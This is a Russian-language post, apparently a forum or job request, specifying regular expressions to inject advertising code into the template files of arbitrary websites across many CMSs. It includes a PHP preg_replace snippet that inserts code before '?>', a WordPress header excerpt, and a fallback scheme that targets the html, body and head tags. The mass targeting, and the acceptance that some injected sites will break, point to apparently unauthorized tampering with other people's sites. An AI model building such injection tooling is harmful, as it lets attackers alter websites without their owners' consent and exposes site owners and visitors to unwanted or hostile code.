Внедрение кода в страницы сайтов с помошью regexp

Набор регулярных выражений для внедрения кода рекламных блоков

Внедрятся код будет в различные сайты нет конкретной структуры

Это может быть любая популярная цмс или самописный движок

Конечно понятно что 100% сайтов не охватить некоторе после внедрения кода будут поломанны

Но важно охватить максимально большой %

Сайты могут быть на php asp perl html

С html все просто и понятно

С другими дело обстоит сложенее имеется алгоритм который ишет списко файлов на сайте

для внедрения кода (как парвило файлы шаблоно типа header.php footer.php или header.tpl итп)

В html файлы встовляется html код

В php сайты соотвественно код php

И так примерные требования к списку регулярных выражений

Наш рекламный код будет внедрятся в уже сушествуюший php код обычно в конец тоесть перед ?>

Например вот так

---------------

$code = "Рекламный код ";

$pattern = '@(\?>)@Umsi';

$content = preg_replace($pattern, $code . "\${1}", $content, 1, $count);

---------------

Но вот возьмем к примеру кусочек кода шаблона Wordpress

headre.php

--------------------------------

/**

* The Header for our theme.

*

* Displays all of the section and everything up till

*

* @package WordPress

* @subpackage Twenty_Ten

* @since Twenty Ten 1.0

*/

?>

>

<?php </p><p> /* </p><p> * Print the <title> tag based on what is being viewed. </p><p> */ </p><p> global $page, $paged; </p><p> </p><p> wp_title( '|', true, 'right' ); </p><p> </p><p> // Add the blog name. </p><p> bloginfo( 'name' ); </p><p> </p><p> // Add the blog description for the home/front page. </p><p> $site_description = get_bloginfo( 'description', 'display' ); </p><p> if ( $site_description && ( is_home() || is_front_page() ) ) </p><p> echo " | $site_description"; </p><p> </p><p> // Add a page number if necessary: </p><p> if ( $paged >= 2 || $page >= 2 ) </p><p> echo ' | ' . sprintf( __( 'Page %s', 'twentyten' ), max( $paged, $page ) ); </p><p> </p><p> ?>

/* We add some JavaScript to pages with the comment form

* to support sites with threaded comments (when in use).

*/

if ( is_singular() && get_option( 'thread_comments' ) )

wp_enqueue_script( 'comment-reply' );

/* Always have wp_head() just before the closing

* tag of your theme, or you will break many plugins, which

* generally use this hook to add elements to such

* as styles, scripts, and meta tags.

*/

wp_head();

?>

>

--------------------------------

При приведенном выше методе код будет вставлен в еше до открытия тегов html не говоря уюе про body и head

Значит регулярное вырожение должно искать теги html body head и вставлять код после их открытия

если этих тегов нет то переходим к следуюшему регулярному выражению например то что было примеденно выше и так далеее.